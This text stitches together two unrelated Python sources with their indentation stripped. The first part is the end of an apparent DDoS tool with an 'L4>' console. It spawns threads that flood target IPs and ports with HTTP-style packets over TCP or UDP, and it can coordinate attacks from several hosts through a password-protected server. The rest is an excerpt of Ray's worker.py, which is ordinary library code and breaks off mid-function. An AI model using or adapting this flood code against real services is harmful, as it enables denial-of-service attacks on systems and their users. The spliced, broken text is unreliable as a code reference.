print("Output: %s" % var.outtxt)
print("Muted: %s" % var.outtxtmute)
print("Packet message: %s" % var.message[:15])
print("Repeat packet text: %s" % var.rtxt)
print("Stress-Test mode: %s" % var.stress)
print("Stress-Test level duration: %s" % var.timeforstress)
print("Start Delay: %s" % var.autostart)
print("Stop after x seconds: %s" % var.autostop)
print("Time between threads: %s" % var.autostep)
if len(var.user_agents) == 1:
print("User Agent: %s" % var.user_agents[0])
if var.get_url != "":
print("GET Header: %s" % var.get_url)
print("")
def stresstest(self):
print(" ")
print("Time between: %s" % str(var.timeforstress))
print("Using %s threads per round" % str(var.threads))
print("To stop the attack press: CTRL + C")
print(" ")
sleep(2)
while True:
for thread in range(var.threads):
try:
t = Thread(target=self.ddos)
t.start()
except Exception:
print("\x1b[0;39mFailed to start a thread.")
sleep(var.timeforstress)
if var.stresserror:
print(" ")
print("Stopped at %s threads!" % (str(var.stresstestvar * var.threads)))
print(" ")
var.runactive = False
quit()
else:
var.stresstestvar += 1
def ddos(self):
mesalready = False
if var.get_url == "":
var.get_url = var.ip
packet = ("GET /%s HTTP/1.1\r\nHost: %s\r\n User-Agent: %s\r\nConnection: Keep-Alive\r\nAccept-Language: en-us\r\nAccept-Encoding: gzip, deflate\r\n%s\r\n\r\n" % (var.get_url, var.ip, choice(var.user_agents), var.message)).encode("utf-8")
if not var.outtxtmute:
print("Thread started!")
if var.socketmethod == "UDP":
mysocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
else:
mysocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while var.runactive:
for ipvalue in var.ip:
for portvalue in var.port:
try:
if var.socketmethod == "TCP":
mysocket.connect((ipvalue, portvalue))
else:
try:
mysocket.bind((ipvalue, portvalue))
except Exception:
pass
if var.socketmethod == "TCP":
mysocket.send(packet)
try:
mysocket.sendto(packet, (ipvalue, portvalue))
except Exception:
mysocket.send(packet)
if var.outtxt:
if not mesalready:
mesalready = True
print("\nSuccess for %s with port %s!" % (ipvalue, portvalue))
# sleep(sleepy)
var.command_log.append("Sucessful execution.")
except socket.error as ex:
if not var.outtxtmute:
mesalready = False
print("\nTarget %s with port %s not accepting request!" % (ipvalue, portvalue))
var.command_log.append("ERROR: %s" % ex)
if var.l4_debug:
print("ERROR: %s" % ex)
if var.stress:
var.stresserror = True
if var.socketmethod == "TCP":
try:
mysocket.close()
except Exception:
pass
if int(var.autostop) != 0:
autoendtime = time()
autotimer = (int(autoendtime) - int(var.autostarttime))
if var.autostop <= autotimer:
print("\x1b[0;39mAuto Stop")
var.runactive = False
quit()
var.stoped_threads += 1
@event.command
def run(command):
print("")
if var.ip != "":
def execute():
print("")
print("To stop the attack press: ENTER or CRTL + C")
sleep(3)
sleep(var.autostart)
if var.stress:
if len(var.target) == 1 and len(var.port) == 1:
self.stresstest()
else:
print("Do not use multiple targets/ports in the Stress-Testing mode.")
else: # Normal Mode
if var.autostop != 0:
var.autostarttime = time()
for thread in range(var.threads):
try:
t = Thread(target=self.ddos)
sleep(var.autostep)
t.start()
except Exception:
print("Could not start thread %s." % thread)
def reset_attack():
print("Stopping threads...")
var.runactive = False
sleep(2)
while True:
if var.stoped_threads == var.threads:
break
else:
sleep(1)
if var.l4_debug:
print("Saving debugging log...")
output_to = path.join(getcwd(), "l4_debug_log.txt")
write_method = "a"
if path.isfile(output_to):
write_method = "a"
else:
write_method = "w"
output_file = open(output_to, write_method)
if write_method == "a":
output_file.write("------------- New Log -------------")
output_file.write(str(name + "\n"))
output_file.write(str(version + "\n"))
output_file.write(str("\n".join(var.command_log)))
output_file.close()
print("Done.")
quit()
def check_stopped_execution():
while True:
data = requests.post((var.server[2] + "get/agreed"), data={"password": var.server[3]}).text
if data != "True":
reset_attack()
break
else:
sleep(1)
try:
if var.server[0] and var.server[0]:
rec_t = Thread(target=check_stopped_execution)
rec_t.start()
input("\r")
except KeyboardInterrupt:
pass
if var.server[0] and var.server[1]:
status = requests.post((var.server[2] + "set/agreed"), data={"password": var.server[3], "data": "False"}).text
if status != "200":
print("An error occured, while sending data to the server.")
reset_attack()
if var.server[0] and not var.server[1]:
while True:
data = requests.post((var.server[2] + "get/agreed"), data={"password": var.server[3]}).text
if data == "True":
execute()
break
else:
sleep(1)
elif not tools.question("\nDo you agree to the terms of use?"):
print("Agreement not accepted.")
quit()
else:
if var.server[0] and var.server[1]:
if tools.question("\nWould you like to use the host as part of the ddos?"):
status = requests.post((var.server[2] + "set/agreed"), data={"password": var.server[3], "data": "True"}).text
if status != "200":
print("An error occured, while sending data to the server.")
execute()
else:
status = requests.post((var.server[2] + "set/agreed"), data={"password": var.server[3], "data": "True"}).text
if status != "200":
print("An error occured, while sending data to the server.")
try:
print("[Press Enter to stop the attack.]")
except KeyboardInterrupt:
pass
status = requests.post((var.server[2] + "set/agreed"), data={"password": var.server[3], "data": "False"}).text
if status != "200":
print("An error occured, while sending data to the server.")
else:
execute()
else:
print("No target has been defined.")
print("")
def setup(console):
console.ps1 = "L4> "
console.add(Main(console), event)
|
worker.py
|
from contextlib import contextmanager
import atexit
import faulthandler
import hashlib
import inspect
import io
import json
import logging
import os
import redis
import sys
import threading
import time
import traceback
from typing import Any, Callable, Dict, Iterator, List, Optional, Tuple, Union
# Ray modules
from ray.autoscaler._private.constants import AUTOSCALER_EVENTS
from ray.autoscaler._private.util import DEBUG_AUTOSCALING_ERROR
import ray.cloudpickle as pickle
import ray._private.memory_monitor as memory_monitor
import ray.node
import ray.job_config
import ray._private.parameter
import ray.ray_constants as ray_constants
import ray.remote_function
import ray.serialization as serialization
import ray._private.gcs_utils as gcs_utils
import ray._private.services as services
from ray._private.runtime_env import working_dir as working_dir_pkg
import ray._private.import_thread as import_thread
from ray.util.tracing.tracing_helper import import_from_string
from ray.util.annotations import PublicAPI, DeveloperAPI, Deprecated
from ray.util.debug import log_once
import ray
import colorama
import setproctitle
import ray.state
from ray import (
ActorID,
JobID,
ObjectRef,
Language,
)
import ray._private.profiling as profiling
from ray.exceptions import (
RaySystemError,
RayError,
RayTaskError,
ObjectStoreFullError,
)
from ray._private.function_manager import FunctionActorManager
from ray._private.ray_logging import setup_logger
from ray._private.ray_logging import global_worker_stdstream_dispatcher
from ray._private.utils import check_oversized_function
from ray.util.inspect import is_cython
from ray.experimental.internal_kv import _internal_kv_get, \
_internal_kv_initialized
from ray._private.client_mode_hook import client_mode_hook
SCRIPT_MODE = 0
WORKER_MODE = 1
LOCAL_MODE = 2
SPILL_WORKER_MODE = 3
RESTORE_WORKER_MODE = 4
ERROR_KEY_PREFIX = b"Error:"
# Logger for this module. It should be configured at the entry point
# into the program using Ray. Ray provides a default configuration at
# entry/init points.
logger = logging.getLogger(__name__)
# Visible for testing.
def _unhandled_error_handler(e: Exception):
logger.error("Unhandled error (suppress with "
"RAY_IGNORE_UNHANDLED_ERRORS=1): {}".format(e))
class Worker:
"""A class used to define the control flow of a worker process.
Note:
The methods in this class are considered unexposed to the user. The
functions outside of this class are considered exposed.
Attributes:
node (ray.node.Node): The node this worker is attached to.
mode: The mode of the worker. One of SCRIPT_MODE, LOCAL_MODE, and
WORKER_MODE.
cached_functions_to_run (List): A list of functions to run on all of
the workers that should be exported as soon as connect is called.
"""
def __init__(self):
"""Initialize a Worker object."""
self.node = None
self.mode = None
self.cached_functions_to_run = []
self.actors = {}
# When the worker is constructed. Record the original value of the
# CUDA_VISIBLE_DEVICES environment variable.
self.original_gpu_ids = ray._private.utils.get_cuda_visible_devices()
self.memory_monitor = memory_monitor.MemoryMonitor()
# A dictionary that maps from driver id to SerializationContext
# TODO: clean up the SerializationContext once the job finished.
self.serialization_context_map = {}
self.function_actor_manager = FunctionActorManager(self)
# This event is checked regularly by all of the threads so that they
# know when to exit.
self.threads_stopped = threading.Event()
# Index of the current session. This number will
# increment every time when `ray.shutdown` is called.
self._session_index = 0
# If this is set, the next .remote call should drop into the
# debugger, at the specified breakpoint ID.
self.debugger_breakpoint = b""
# If this is set, ray.get calls invoked on the object ID returned
# by the worker should drop into the debugger at the specified
# breakpoint ID.
self.debugger_get_breakpoint = b""
# If True, make the debugger external to the node this worker is
# running on.
self.ray_debugger_external = False
self._load_code_from_local = False
# Used to toggle whether or not logs should be filtered to only those
# produced in the same job.
self.filter_logs_by_job = True
@property
def connected(self):
"""bool: True if Ray has been started and False otherwise."""
return self.node is not None
@property
def node_ip_address(self):
self.check_connected()
return self.node.node_ip_address
@property
def load_code_from_local(self):
self.check_connected()
return self._load_code_from_local
@property
def current_job_id(self):
if hasattr(self, "core_worker"):
return self.core_worker.get_current_job_id()
return JobID.nil()
@property
def actor_id(self):
if hasattr(self, "core_worker"):
return self.core_worker.get_actor_id()
return ActorID.nil()
@property
def current_task_id(self):
return self.core_worker.get_current_task_id()
@property
def current_node_id(self):
return self.core_worker.get_current_node_id()
@property
def namespace(self):
return self.core_worker.get_job_config().ray_namespace
@property
def placement_group_id(self):
return self.core_worker.get_placement_group_id()
@property
def worker_id(self):
return self.core_worker.get_worker_id().binary()
@property
def should_capture_child_tasks_in_placement_group(self):
return self.core_worker.should_capture_child_tasks_in_placement_group()
@property
def current_session_and_job(self):
"""Get the current session index and job id as pair."""
assert isinstance(self._session_index, int)
assert isinstance(self.current_job_id, ray.JobID)
return self._session_index, self.current_job_id
@property
def runtime_env(self):
"""Get the runtime env in json format"""
return json.loads(
self.core_worker.get_job_config().runtime_env.raw_json)
def get_serialization_context(self, job_id=None):
"""Get the SerializationContext of the job that this worker is processing.
Args:
job_id: The ID of the job that indicates which job to get
the serialization context for.
Returns:
The serialization context of the given job.
"""
# This function needs to be protected by a lock, because it will be
# called by`register_class_for_serialization`, as well as the import
# thread, from different threads. Also, this function will recursively
# call itself, so we use RLock here.
if job_id is None:
job_id = self.current_job_id
with self.lock:
if job_id not in self.serialization_context_map:
self.serialization_context_map[
job_id] = serialization.SerializationContext(self)
return self.serialization_context_map[job_id]
def check_connected(self):
"""Check if the worker is connected.
Raises:
Exception: An exception is raised if the worker is not connected.
"""
if not self.connected:
if os.environ.get("RAY_ENABLE_AUTO_CONNECT", "") != "0":
ray.client().connect()
return
raise RaySystemError("Ray has not been started yet. You can "
"start Ray with 'ray.init()'.")
def set_mode(self, mode):
"""Set the mode of the worker.
The mode SCRIPT_MODE should be used if this Worker is a driver that is
being run as a Python script or interactively in a shell. It will print
information about task failures.
The mode WORKER_MODE should be used if this Worker is not a driver. It
will not print information about tasks.
The mode LOCAL_MODE should be used if this Worker is a driver and if
you want to run the driver in a manner equivalent to serial Python for
debugging purposes. It will not send remote function calls to the
scheduler and will instead execute them in a blocking fashion.
Args:
mode: One of SCRIPT_MODE, WORKER_MODE, and LOCAL_MODE.
"""
self.mode = mode
def set_load_code_from_local(self, load_code_from_local):
self._load_code_from_local = load_code_from_local
def put_object(self, value, object_ref=None, owner_address=None):
"""Put value in the local object store with object reference `object_ref`.
This assumes that the value for `object_ref` has not yet been placed in
the local object store. If the plasma store is full, the worker will
automatically retry up to DEFAULT_PUT_OBJECT_RETRIES times. Each
retry will delay for an exponentially doubling amount of time,
starting with DEFAULT_PUT_OBJECT_DELAY. After this, exception
will be raised.
Args:
value: The value to put in the object store.
object_ref (ObjectRef): The object ref of the value to be
put. If None, one will be generated.
owner_address: The serialized address of object's owner.
Returns:
ObjectRef: The object ref the object was put under.
Raises:
ray.exceptions.ObjectStoreFullError: This is raised if the attempt
to store the object fails because the object store is full even
after multiple retries.
"""
# Make sure that the value is not an object ref.
if isinstance(value, ObjectRef):
raise TypeError(
"Calling 'put' on an ray.ObjectRef is not allowed "
"(similarly, returning an ray.ObjectRef from a remote "
"function is not allowed). If you really want to "
"do this, you can wrap the ray.ObjectRef in a list and "
"call 'put' on it (or return it).")
if self.mode == LOCAL_MODE:
assert object_ref is None, ("Local Mode does not support "
"inserting with an ObjectRef")
serialized_value = self.get_serialization_context().serialize(value)
# This *must* be the first place that we construct this python
# ObjectRef because an entry with 0 local references is created when
# the object is Put() in the core worker, expecting that this python
# reference will be created. If another reference is created and
# removed before this one, it will corrupt the state in the
# reference counter.
return ray.ObjectRef(
self.core_worker.put_serialized_object(
serialized_value,
object_ref=object_ref,
owner_address=owner_address))
def raise_errors(self, data_metadata_pairs, object_refs):
out = self.deserialize_objects(data_metadata_pairs, object_refs)
if "RAY_IGNORE_UNHANDLED_ERRORS" in os.environ:
return
for e in out:
_unhandled_error_handler(e)
def deserialize_objects(self, data_metadata_pairs, object_refs):
# Function actor manager or the import thread may call pickle.loads
# at the same time which can lead to failed imports
# TODO: We may be better off locking on all imports or injecting a lock
# into pickle.loads (https://github.com/ray-project/ray/issues/16304)
with self.function_actor_manager.lock:
context = self.get_serialization_context()
return context.deserialize_objects(data_metadata_pairs,
object_refs)
def get_objects(self, object_refs, timeout=None):
"""Get the values in the object store associated with the IDs.
Return the values from the local object store for object_refs. This
will block until all the values for object_refs have been written to
the local object store.
Args:
object_refs (List[object_ref.ObjectRef]): A list of the object refs
whose values should be retrieved.
timeout (float): timeout (float): The maximum amount of time in
seconds to wait before returning.
Returns:
list: List of deserialized objects
bytes: UUID of the debugger breakpoint we should drop
into or b"" if there is no breakpoint.
"""
# Make sure that the values are object refs.
for object_ref in object_refs:
if not isinstance(object_ref, ObjectRef):
raise TypeError(
f"Attempting to call `get` on the value {object_ref}, "
"which is not an ray.ObjectRef.")
timeout_ms = int(timeout * 1000) if timeout else -1
data_metadata_pairs = self.core_worker.get_objects(
object_refs, self.current_task_id, timeout_ms)
debugger_breakpoint = b""
for (data, metadata) in data_metadata_pairs:
if metadata:
metadata_fields = metadata.split(b",")
if len(metadata_fields) >= 2 and metadata_fields[1].startswith(
ray_constants.OBJECT_METADATA_DEBUG_PREFIX):
debugger_breakpoint = metadata_fields[1][len(
ray_constants.OBJECT_METADATA_DEBUG_PREFIX):]
return self.deserialize_objects(data_metadata_pairs,
object_refs), debugger_breakpoint
def run_function_on_all_workers(self, function,
run_on_other_drivers=False):
"""Run arbitrary code on all of the workers.
This function will first be run on the driver, and then it will be
exported to all of the workers to be run. It will also be run on any
new workers that register later. If ray.init has not been called yet,
then cache the function and export it later.
Args:
function (Callable): The function to run on all of the workers. It
takes only one argument, a worker info dict. If it returns
anything, its return values will not be used.
run_on_other_drivers: The boolean that indicates whether we want to
run this function on other drivers. One case is we may need to
share objects across drivers.
"""
# If ray.init has not been called yet, then cache the function and
# export it when connect is called. Otherwise, run the function on all
# workers.
if self.mode is None:
self.cached_functions_to_run.append(function)
else:
# Attempt to pickle the function before we need it. This could
# fail, and it is more convenient if the failure happens before we
# actually run the function locally.
pickled_function = pickle.dumps(function)
function_to_run_id = hashlib.shake_128(pickled_function).digest(
ray_constants.ID_SIZE)
key = b"FunctionsToRun:" + function_to_run_id
# First run the function on the driver.
# We always run the task locally.
function({"worker": self})
# Check if the function has already been put into redis.
function_exported = self.redis_client.setnx(b"Lock:" + key, 1)
if not function_exported:
# In this case, the function has already been exported, so
# we don't need to export it again.
return
check_oversized_function(pickled_function, function.__name__,
"function", self)
# Run the function on all workers.
self.redis_client.hset(
key,
mapping={
"job_id": self.current_job_id.binary(),
"function_id": function_to_run_id,
"function": pickled_function,
"run_on_other_drivers": str(run_on_other_drivers),
})
self.redis_client.rpush("Exports", key)
# TODO(rkn): If the worker fails after it calls setnx and before it
# successfully completes the hset and rpush, then the program will
# most likely hang. This could be fixed by making these three
# operations into a transaction (or by implementing a custom
# command that does all three things).
def main_loop(self):
"""The main loop a worker runs to receive and execute tasks."""
def sigterm_handler(signum, frame):
shutdown(True)
sys.exit(1)
ray._private.utils.set_sigterm_handler(sigterm_handler)
self.core_worker.run_task_loop()
sys.exit(0)
def print_logs(self):
"""Prints log messages from workers on all nodes in the same job.
"""
pubsub_client = self.redis_client.pubsub(
ignore_subscribe_messages=True)
pubsub_client.subscribe(gcs_utils.LOG_FILE_CHANNEL)
localhost = services.get_node_ip_address()
try:
# Keep track of the number of consecutive log messages that have
# been received with no break in between. If this number grows
# continually, then the worker is probably not able to process the
# log messages as rapidly as they are coming in.
num_consecutive_messages_received = 0
job_id_binary = ray._private.utils.binary_to_hex(
self.current_job_id.binary())
while True:
# Exit if we received a signal that we should stop.
if self.threads_stopped.is_set():
return
msg = pubsub_client.get_message()
if msg is None:
num_consecutive_messages_received = 0
self.threads_stopped.wait(timeout=0.01)
continue
num_consecutive_messages_received += 1
if (num_consecutive_messages_received % 100 == 0
and num_consecutive_messages_received > 0):
logger.warning(
"The driver may not be able to keep up with the "
"stdout/stderr of the workers. To avoid forwarding "
"logs to the driver, use "
"'ray.init(log_to_driver=False)'.")
data = json.loads(ray._private.utils.decode(msg["data"]))
# Don't show logs from other drivers.
if (self.filter_logs_by_job and data["job"]
and job_id_binary != data["job"]):
continue
data["localhost"] = localhost
global_worker_stdstream_dispatcher.emit(data)
except (OSError, redis.exceptions.ConnectionError) as e:
logger.error(f"print_logs: {e}")
finally:
# Close the pubsub client to avoid leaking file descriptors.
pubsub_client.close()
@PublicAPI
@client_mode_hook
def get_gpu_ids():
"""Get the IDs of the GPUs that are available to the worker.
If the CUDA_VISIBLE_DEVICES environment variable was set when the worker
started up, then the IDs returned by this method will be a subset of the
IDs in CUDA_VISIBLE_DEVICES. If not, the IDs will fall in the range
[0, NUM_GPUS - 1], where NUM_GPUS is the number of GPUs that the node has.
Returns:
A list of GPU IDs.
"""
worker = global_worker
worker.check_connected()
if worker.mode != WORKER_MODE:
if log_once("worker_get_gpu_ids_empty_from_driver"):
logger.warning(
"`ray.get_gpu_ids()` will always return the empty list when "
"called from the driver. This is because Ray does not manage "
"GPU allocations to the driver process.")
# TODO(ilr) Handle inserting resources in local mode
all_resource_ids = global_worker.core_worker.resource_ids()
assigned_ids = set()
for resource, assignment in all_resource_ids.items():
# Handle both normal and placement group GPU resources.
# Note: We should only get the GPU ids from the placement
# group resource that does not contain the bundle index!
import re
if resource == "GPU" or re.match(r"^GPU_group_[0-9A-Za-z]+$",
resource):
for resource_id, _ in assignment:
assigned_ids.add(resource_id)
assigned_ids = list(assigned_ids)
# If the user had already set CUDA_VISIBLE_DEVICES, then respect that (in
# the sense that only GPU IDs that appear in CUDA_VISIBLE_DEVICES should be
# returned).
if global_worker.original_gpu_ids is not None:
assigned_ids = [
global_worker.original_gpu_ids[gpu_id] for gpu_id in assigned_ids
]
# Give all GPUs in local_mode.
if global_worker.mode == LOCAL_MODE:
max_gpus = global_worker.node.get_resource_spec().num_gpus
assigned_ids = global_worker.original_gpu_ids[:max_gpus]
return assigned_ids
@Deprecated
def get_resource_ids():
"""Get the IDs of the resources that are available to the worker.
Returns:
A dictionary mapping the name of a resource to a list of pairs, where
each pair consists of the ID of a resource and the fraction of that
resource reserved for this worker.
"""
worker = global_worker
worker.check_connected()
if _mode() == LOCAL_MODE:
raise RuntimeError(
"ray.worker.get_resource_ids() currently does not work in "
"local_mode.")
return global_worker.core_worker.resource_ids()
@Deprecated
def get_dashboard_url():
"""Get the URL to access the Ray dashboard.
Note that the URL does not specify which node the dashboard is on.
Returns:
The URL of the dashboard as a string.
"""
worker = global_worker
worker.check_connected()
return _global_node.webui_url
global_worker = Worker()
"""Worker: The global Worker object for this worker process.
We use a global Worker object to ensure that there is a single worker object
per worker process.
"""
_global_node = None
"""ray.node.Node: The global node object that is created by ray.init()."""
@PublicAPI
@client_mode_hook
def init(
address: Optional[str] = None,
*,
num_cpus: Optional[int] = None,
num_gpus: Optional[int] = None,
resources: Optional[Dict[str, float]] = None,
object_store_memory: Optional[int] = None,
local_mode: bool = False,
ignore_reinit_error: bool = False,
include_dashboard: Optional[bool] = None,
dashboard_host: str = ray_constants.DEFAULT_DASHBOARD_IP,
dashboard_port: Optional[int] = None,
job_config: "ray.job_config.JobConfig" = None,
configure_logging: bool = True,
logging_level: int = logging.INFO,
logging_format: str = ray_constants.LOGGER_FORMAT,
log_to_driver: bool = True,
namespace: Optional[str] = None,
runtime_env: Dict[str, Any] = None,
# The following are unstable parameters and their use is discouraged.
_enable_object_reconstruction: bool = False,
_redis_max_memory: Optional[int] = None,
_plasma_directory: Optional[str] = None,
_node_ip_address: str = ray_constants.NODE_DEFAULT_IP,
_driver_object_store_memory: Optional[int] = None,
_memory: Optional[int] = None,
_redis_password: str = ray_constants.REDIS_DEFAULT_PASSWORD,
_temp_dir: Optional[str] = None,
_lru_evict: bool = False,
_metrics_export_port: Optional[int] = None,
_system_config: Optional[Dict[str, str]] = None,
_tracing_startup_hook: Optional[Callable] = None,
**kwargs):
"""
Connect to an existing Ray cluster or start one and connect to it.
This method handles two cases; either a Ray cluster already exists and we
just attach this driver to it or we start all of the processes associated
with a Ray cluster and attach to the newly started cluster.
To start Ray locally and all of the relevant processes, use this as
follows:
.. code-block:: python
ray.init()
To connect to an existing local cluster, use this as follows (substituting
in the appropriate port if needed).
.. code-block:: python
ray.init(address="localhost:6379")
To connect to an existing remote cluster, use this as follows (substituting
in the appropriate address). Note the addition of "ray://" at the beginning
of the address.
.. code-block:: python
ray.init(address="ray://123.45.67.89:10001")
More details for starting and connecting to a remote cluster can be found
here: https://docs.ray.io/en/master/cluster/ray-client.html
You can also define an environment variable called `RAY_ADDRESS` in
the same format as the `address` parameter to connect to an existing
cluster with ray.init() or ray.init(address="auto").
Args:
address (str): The address of the Ray cluster to connect to. If
this address is not provided, then this command will start Redis,
a raylet, a plasma store, a plasma manager, and some workers.
It will also kill these processes when Python exits. If the driver
is running on a node in a Ray cluster, using `auto` as the value
tells the driver to detect the cluster, removing the need to
specify a specific node address. If the environment variable
`RAY_ADDRESS` is defined and the address is None or "auto", Ray
will set `address` to `RAY_ADDRESS`.
Addresses can be prefixed with a "ray://" to connect to a remote
cluster. For example, passing in the address
"ray://123.45.67.89:50005" will connect to the cluster at the
given address.
num_cpus (int): Number of CPUs the user wishes to assign to each
raylet. By default, this is set based on virtual cores.
num_gpus (int): Number of GPUs the user wishes to assign to each
raylet. By default, this is set based on detected GPUs.
resources: A dictionary mapping the names of custom resources to the
quantities for them available.
object_store_memory: The amount of memory (in bytes) to start the
object store with. By default, this is automatically set based on
available system memory.
local_mode (bool): If true, the code will be executed serially. This
is useful for debugging.
ignore_reinit_error: If true, Ray suppresses errors from calling
ray.init() a second time. Ray won't be restarted.
include_dashboard: Boolean flag indicating whether or not to start the
Ray dashboard, which displays the status of the Ray
cluster. If this argument is None, then the UI will be started if
the relevant dependencies are present.
dashboard_host: The host to bind the dashboard server to. Can either be
localhost (127.0.0.1) or 0.0.0.0 (available from all interfaces).
By default, this is set to localhost to prevent access from
external machines.
dashboard_port(int, None): The port to bind the dashboard server to.
Defaults to 8265 and Ray will automatically find a free port if
8265 is not available.
job_config (ray.job_config.JobConfig): The job configuration.
configure_logging: True (default) if configuration of logging is
allowed here. Otherwise, the user may want to configure it
separately.
logging_level: Logging level, defaults to logging.INFO. Ignored unless
"configure_logging" is true.
logging_format: Logging format, defaults to string containing a
timestamp, filename, line number, and message. See the source file
ray_constants.py for details. Ignored unless "configure_logging"
is true.
log_to_driver (bool): If true, the output from all of the worker
processes on all nodes will be directed to the driver.
namespace (str): Namespace to use
runtime_env (dict): The runtime environment to use for this job (see
:ref:`runtime-environments` for details). This API is in beta
and may change before becoming stable.
_enable_object_reconstruction (bool): If True, when an object stored in
the distributed plasma store is lost due to node failure, Ray will
attempt to reconstruct the object by re-executing the task that
created the object. Arguments to the task will be recursively
reconstructed. If False, then ray.ObjectLostError will be
thrown.
_redis_max_memory: Redis max memory.
_plasma_directory: Override the plasma mmap file directory.
_node_ip_address (str): The IP address of the node that we are on.
_driver_object_store_memory (int): Deprecated.
_memory: Amount of reservable memory resource to create.
_redis_password (str): Prevents external clients without the password
from connecting to Redis if provided.
_temp_dir (str): If provided, specifies the root temporary
directory for the Ray process. Defaults to an OS-specific
conventional location, e.g., "/tmp/ray".
_metrics_export_port(int): Port number Ray exposes system metrics
through a Prometheus endpoint. It is currently under active
development, and the API is subject to change.
_system_config (dict): Configuration for overriding
RayConfig defaults. For testing purposes ONLY.
_tracing_startup_hook (str): If provided, turns on and sets up tracing
for Ray. Must be the name of a function that takes no arguments and
sets up a Tracer Provider, Remote Span Processors, and
(optional) additional instruments. See more at
docs.ray.io/tracing.html. It is currently under active development,
and the API is subject to change.
Returns:
If the provided address includes a protocol, for example by prepending
"ray://" to the address to get "ray://1.2.3.4:10001", then a
ClientContext is returned with information such as settings, server
versions for ray and python, and the dashboard_url. Otherwise,
returns address information about the started processes.
Raises:
Exception: An exception is raised if an inappropriate combination of
arguments is passed in.
"""
# If available, use RAY_ADDRESS to override if the address was left
# unspecified, or set to "auto" in the call to init
address_env_var = os.environ.get(
ray_constants.RAY_ADDRESS_ENVIRONMENT_VARIABLE)
if address_env_var:
if address is None or address == "auto":
address = address_env_var
logger.info(
f"Using address {address_env_var} set in the environment "
f"variable {ray_constants.RAY_ADDRESS_ENVIRONMENT_VARIABLE}")
if address is not None and "://" in address:
# Address specified a protocol, use ray client
builder = ray.client(address)
# Forward any keyword arguments that were changed from their default
# values to the builder
init_sig = inspect.signature(init)
passed_kwargs = {}
for argument_name, param_obj in init_sig.parameters.items():
if argument_name in {"kwargs", "address"}:
# kwargs and address are handled separately
continue
default_value = param_obj.default
passed_value = locals()[argument_name]
if passed_value != default_value:
# passed value is different than default, pass to the client
# builder
passed_kwargs[argument_name] = passed_value
passed_kwargs.update(kwargs)
builder._init_args(**passed_kwargs)
return builder.connect()
if kwargs:
# User passed in extra keyword arguments but isn't connecting through
# ray client. Raise an error, since most likely a typo in keyword
unknown = ", ".join(kwargs)
raise RuntimeError(f"Unknown keyword argument(s): {unknown}")
# Try to increase the file descriptor limit, which is too low by
# default for Ray: https://github.com/ray-project/ray/issues/11239
try:
import resource
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
if soft < hard:
# https://github.com/ray-project/ray/issues/12059
soft = max(soft, min(hard, 65536))
logger.debug("Automatically increasing RLIMIT_NOFILE to max "
"value of {}".format(hard))
try:
resource.setrlimit(resource.RLIMIT_NOFILE, (soft, hard))
except ValueError:
logger.debug("Failed to raise limit.")
soft, _ = resource.getrlimit(resource.RLIMIT_NOFILE)
if soft < 4096:
logger.warning(
"File descriptor limit {} is too low for production "
"servers and may result in connection errors. "
"At least 8192 is recommended. --- "
"Fix with 'ulimit -n 8192'".format(soft))
except ImportError:
logger.debug("Could not import resource module (on Windows)")
pass
if runtime_env:
if job_config is None:
job_config = ray.job_config.JobConfig()
job_config.set_runtime_env(runtime_env)
# Convert hostnames to numerical IP address.
if _node_ip_address is not None:
node_ip_address = services.address_to_ip(_node_ip_address)
raylet_ip_address = node_ip_address
if address:
redis_address, _, _ = services.validate_redis_address(address)
else:
redis_address = None
if configure_logging:
setup_logger(logging_level, logging_format)
if redis_address is not None:
logger.info(
f"Connecting to existing Ray cluster at address: {redis_address}")
if local_mode:
driver_mode = LOCAL_MODE
else:
driver_mode = SCRIPT_MODE
if global_worker.connected:
if ignore_reinit_error:
logger.info(
"Calling ray.init() again after it has already been called.")
return
else:
raise RuntimeError("Maybe you called ray.init twice by accident? "
"This error can be suppressed by passing in "
"'ignore_reinit_error=True' or by calling "
"'ray.shutdown()' prior to 'ray.init()'.")
_system_config = _system_config or {}
if not isinstance(_system_config, dict):
raise TypeError("The _system_config must be a dict.")
global _global_node
if redis_address is None:
# In this case, we need to start a new cluster.
ray_params = ray._private.parameter.RayParams(
redis_address=redis_address,
node_ip_address=node_ip_address,
raylet_ip_address=raylet_ip_address,
object_ref_seed=None,
driver_mode=driver_mode,
redirect_worker_output=None,
redirect_output=None,
num_cpus=num_cpus,
num_gpus=num_gpus,
resources=resources,
num_redis_shards=None,
redis_max_clients=None,
redis_password=_redis_password,
plasma_directory=_plasma_directory,
huge_pages=None,
include_dashboard=include_dashboard,
dashboard_host=dashboard_host,
dashboard_port=dashboard_port,
memory=_memory,
object_store_memory=object_store_memory,
redis_max_memory=_redis_max_memory,
plasma_store_socket_name=None,
temp_dir=_temp_dir,
# We need to disable it if runtime env is not set.
# Uploading happens after core worker is created. And we should
# prevent default worker being created before uploading.
# TODO (yic): Have a separate connection to gcs client when
# removal redis is done. The uploading should happen before this
# one.
start_initial_python_workers_for_first_job=(
job_config is None or job_config.runtime_env is None),
_system_config=_system_config,
lru_evict=_lru_evict,
enable_object_reconstruction=_enable_object_reconstruction,
metrics_export_port=_metrics_export_port,
tracing_startup_hook=_tracing_startup_hook)
# Start the Ray processes. We set shutdown_at_exit=False because we
# shutdown the node in the ray.shutdown call that happens in the atexit
# handler. We still spawn a reaper process in case the atexit handler
# isn't called.
_global_node = ray.node.Node(
head=True,
shutdown_at_exit=False,
spawn_reaper=True,
ray_params=ray_params)
else:
# In this case, we are connecting to an existing cluster.
if num_cpus is not None or num_gpus is not None:
raise ValueError(
"When connecting to an existing cluster, num_cpus "
"and num_gpus must not be provided.")
if resources is not None:
raise ValueError("When connecting to an existing cluster, "
"resources must not be provided.")
if object_store_memory is not None:
raise ValueError("When connecting to an existing cluster, "
"object_store_memory must not be provided.")
if _system_config is not None and len(_system_config) != 0:
raise ValueError("When connecting to an existing cluster, "
"_system_config must not be provided.")
if _enable_object_reconstruction:
raise ValueError(
"When connecting to an existing cluster, "
"_enable_object_reconstruction must not be provided.")
# In this case, we only need to connect the node.
ray_params = ray._private.parameter.RayParams(
node_ip_address=node_ip_address,
raylet_ip_address=raylet_ip_address,
redis_address=redis_address,
redis_password=_redis_password,
object_ref_seed=None,
temp_dir=_temp_dir,
_system_config=_system_config,
lru_evict=_lru_evict,
enable_object_reconstruction=_enable_object_reconstruction,
metrics_export_port=_metrics_export_port)
_global_node = ray.node.Node(
ray_params,
head=False,
shutdown_at_exit=False,
spawn_reaper=False,
connect_only=True)
if driver_mode == SCRIPT_MODE and job_config:
